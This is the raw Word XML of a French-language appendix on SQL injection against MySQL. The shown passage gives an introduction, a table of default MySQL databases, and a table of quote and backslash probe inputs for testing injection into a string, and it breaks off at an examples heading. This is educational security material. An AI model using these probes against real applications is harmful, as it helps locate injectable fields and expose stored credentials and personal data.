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568F" w:rsidRPr="005C620E" w:rsidRDefault="00401C83" w:rsidP="003D23EE">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C620E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Beaucoup de personnes disent qu'ils savent ce que l'injection SQL</w:t>
      </w:r>
      <w:r w:rsidR="0091462D" w:rsidRPr="005C620E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> est</w:t>
      </w:r>
      <w:r w:rsidR="007876E2" w:rsidRPr="005C620E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>, mais tout ce qu’ils ont entendu</w:t>
      </w:r>
      <w:r w:rsidRPr="005C620E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ou </w:t>
      </w:r>
      <w:r w:rsidR="007876E2" w:rsidRPr="005C620E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>éprouvé</w:t>
      </w:r>
      <w:r w:rsidRPr="005C620E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007A436B" w:rsidRPr="005C620E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>est</w:t>
      </w:r>
      <w:r w:rsidRPr="005C620E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> les exemples insignifiants</w:t>
      </w:r>
      <w:r w:rsidR="002679FD" w:rsidRPr="005C620E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> et triviaux</w:t>
      </w:r>
      <w:r w:rsidR="00D54364" w:rsidRPr="005C620E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">. L'injection </w:t>
      </w:r>
      <w:r w:rsidRPr="005C620E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>SQL est l'une des vulnérab</w:t>
      </w:r>
      <w:r w:rsidR="00603951" w:rsidRPr="005C620E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>ilités les plus dévastatrices</w:t>
      </w:r>
      <w:r w:rsidRPr="005C620E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">, car elle peut mener à l'exposition de toutes les informations sensibles stockées dans la base de données d'une application, y compris l'information </w:t>
      </w:r>
      <w:r w:rsidR="00E927D3" w:rsidRPr="005C620E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>sensibles telle que des noms d’</w:t>
      </w:r>
      <w:r w:rsidRPr="005C620E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>utilisateur</w:t>
      </w:r>
      <w:r w:rsidR="00E927D3" w:rsidRPr="005C620E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="005C620E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">, des mots de passe, des noms, des adresses, des numéros de téléphone, et </w:t>
      </w:r>
      <w:r w:rsidR="00E927D3" w:rsidRPr="005C620E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>plus que ça l</w:t>
      </w:r>
      <w:r w:rsidRPr="005C620E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00D54364" w:rsidRPr="005C620E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">s détails de </w:t>
      </w:r>
      <w:r w:rsidRPr="005C620E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>la carte de crédit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0568F" w:rsidRPr="005C620E" w:rsidRDefault="0006399D" w:rsidP="003D23EE">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C620E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Pour bien comprendre l’injection SQL, c</w:t>
      </w:r>
      <w:r w:rsidR="00E0568F" w:rsidRPr="005C620E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="005C620E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">tte annexe </w:t>
      </w:r>
      <w:r w:rsidR="00E0568F" w:rsidRPr="005C620E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>recense de manière synthétique et la plus complète possible, l’ensemble des vecteurs d’attaque pour des injections SQL (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E0568F" w:rsidRPr="005C620E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E0568F" w:rsidRPr="005C620E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E0568F" w:rsidRPr="005C620E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>BSQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E0568F" w:rsidRPr="005C620E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>) ciblant les bases de données MySQL</w:t>
      </w:r>
      <w:r w:rsidR="008813B0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> et donne des exemples de son exploitation ainsi que quelques </w:t>
      </w:r>
      <w:r w:rsidR="00441909">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>conseils</w:t>
      </w:r>
      <w:r w:rsidR="008813B0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour </w:t>
      </w:r>
      <w:r w:rsidR="00441909">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>prévenir</w:t>
      </w:r>
      <w:r w:rsidR="008813B0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> cette </w:t>
      </w:r>
      <w:r w:rsidR="00441909">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>attaque</w:t>
      </w:r>
      <w:r w:rsidR="008813B0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0568F" w:rsidRPr="00BE79FC" w:rsidRDefault="0006399D" w:rsidP="003D23EE">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE79FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Partie 1 :</w:t>
      </w:r>
      <w:r w:rsidR="00EE1A50" w:rsidRPr="00BE79FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Les vecteurs de base</w:t>
      </w:r>
      <w:r w:rsidR="00D04423" w:rsidRPr="00BE79FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> d’injection</w:t>
      </w:r>
      <w:r w:rsidR="005C620E" w:rsidRPr="00BE79FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D8626D" w:rsidRPr="00BE79FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>basique et en aveugle</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00297479" w:rsidRPr="00297479" w:rsidRDefault="00297479" w:rsidP="00B2205B">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567" w:hanging="567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val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00297479">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Bases de données par défaut</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grilleclaire-Accent1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2323"/>
        <w:gridCol w:w="3136"/>
      </w:tblGrid>
      <w:tr w:rsidR="00297479" w:rsidRPr="00297479" w:rsidTr="00A8240C">
        <w:trPr>
          <w:cnfStyle w:val="100000000000"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00297479" w:rsidRPr="00297479" w:rsidRDefault="00297479" w:rsidP="0029747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>mysql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00297479" w:rsidRPr="00297479" w:rsidRDefault="00297479" w:rsidP="00297479">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:cnfStyle w:val="1000000000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>Nécessite</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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les </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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>privilèges</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00297479" w:rsidRPr="00297479" w:rsidTr="00A8240C">
        <w:trPr>
          <w:cnfStyle w:val="000000100000"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00297479" w:rsidRPr="00297479" w:rsidRDefault="00297479" w:rsidP="0029747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>information_schema</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00297479" w:rsidRPr="00297479" w:rsidRDefault="00297479" w:rsidP="00297479">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:cnfStyle w:val="0000001000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>Disponible</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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>depuis</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002974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la version 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A8240C" w:rsidRPr="00A8240C" w:rsidRDefault="00A8240C" w:rsidP="00A8240C">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="100" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="357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val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A8240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 5.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A8240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Bases de données par défaut</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C016A" w:rsidRPr="003C016A" w:rsidRDefault="00297479" w:rsidP="00B2205B">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="100" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567" w:hanging="567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9747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Tester </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00297479">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>une</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0029747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injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00394801" w:rsidRPr="00394801" w:rsidRDefault="00394801" w:rsidP="000E148B">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="540" w:hanging="357"/>
        <w:outlineLvl w:val="1"/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</w:pPr>
      <w:r w:rsidRPr="00394801">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Injection dans une chaîne de caractères</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00394801" w:rsidRPr="00A44733" w:rsidRDefault="00394801" w:rsidP="000E148B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00394801">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pour la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00394801">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>requête</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00394801">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00394801">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>suivante</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00394801">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:r w:rsidR="00A44733">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF0E97">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT * FROM Table WHERE data = '[INJ]';</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grilleclaire-Accent1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="576"/>
        <w:gridCol w:w="1857"/>
        <w:gridCol w:w="750"/>
      </w:tblGrid>
      <w:tr w:rsidR="00394801" w:rsidRPr="00394801" w:rsidTr="0053170F">
        <w:trPr>
          <w:cnfStyle w:val="10000000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 w:rsidP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‘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10000000000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Simple quote x1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10000000000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False</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00394801" w:rsidRPr="00394801" w:rsidTr="0053170F">
        <w:trPr>
          <w:cnfStyle w:val="00000010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 w:rsidP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‘ ‘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Simple quote x2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True</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00394801" w:rsidRPr="00394801" w:rsidTr="0053170F">
        <w:trPr>
          <w:cnfStyle w:val="00000001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 w:rsidP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« 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01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Double quote x1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01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False</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00394801" w:rsidRPr="00394801" w:rsidTr="0053170F">
        <w:trPr>
          <w:cnfStyle w:val="00000010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 w:rsidP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«  »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Double quote x2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True</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00394801" w:rsidRPr="00394801" w:rsidTr="0053170F">
        <w:trPr>
          <w:cnfStyle w:val="00000001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 w:rsidP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\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01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Backslash x1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01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False</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00394801" w:rsidRPr="00394801" w:rsidTr="0053170F">
        <w:trPr>
          <w:cnfStyle w:val="00000010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 w:rsidP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\\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Backslash x2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00394801" w:rsidRPr="00394801" w:rsidRDefault="00394801" w:rsidP="00394801">
            <w:pPr>
              <w:bidi w:val="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True</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0053170F" w:rsidRPr="00A44733" w:rsidRDefault="00F05525" w:rsidP="00A44733">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="100" w:after="100" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00537494">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>able</w:t>
      </w:r>
      <w:r w:rsidR="0053170F" w:rsidRPr="0053170F">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5.2 </w:t>
      </w:r>
      <w:r w:rsidR="0053170F" w:rsidRPr="0053170F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Injection dans une chaîne de caractères</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053170F" w:rsidRPr="004F619F" w:rsidRDefault="00394801" w:rsidP="00B234F2">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F619F">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Exemples</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F619F">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
